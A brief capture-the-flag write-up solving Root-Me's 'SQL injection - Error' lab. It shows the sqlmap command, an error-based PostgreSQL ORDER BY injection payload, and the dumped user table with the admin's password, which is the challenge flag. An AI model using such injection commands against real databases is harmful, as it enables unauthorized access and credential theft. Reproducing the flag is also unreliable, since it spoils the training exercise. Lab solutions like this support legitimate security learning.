https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-Error

SQL injection - Error

[SOAL]
Retrieve administrator’s password.

http://challenge01.root-me.org/web-serveur/ch34/

[POC]

sqlmap -u "http://challenge01.root-me.org/web-serveur/ch34/?action=contents&order=ASC"

---
Parameter: order (GET)
    Type: error-based
    Title: PostgreSQL error-based - ORDER BY, GROUP BY clause
    Payload: action=contents&order=ASC,(CAST((CHR(113)||CHR(98)||CHR(112)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (1788=1788) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(107)||CHR(113)||CHR(113)) AS NUMERIC))
---

back-end DBMS: PostgreSQL
Database: public
Table: m3mbr35t4bl3
[1 entry]
+-----------------+----+----------------------+--------------+
| em41l_c0l       | id | p455w0rd_c0l         | us3rn4m3_c0l |
+-----------------+----+----------------------+--------------+
| admin@localhost | 1  | 1a2BdKT5DIx3qxQN3UaC | admin        |
+-----------------+----+----------------------+--------------+

then go to Authentication

http://challenge01.root-me.org/web-serveur/ch34/?action=login

bingo !!! Flag is admin password
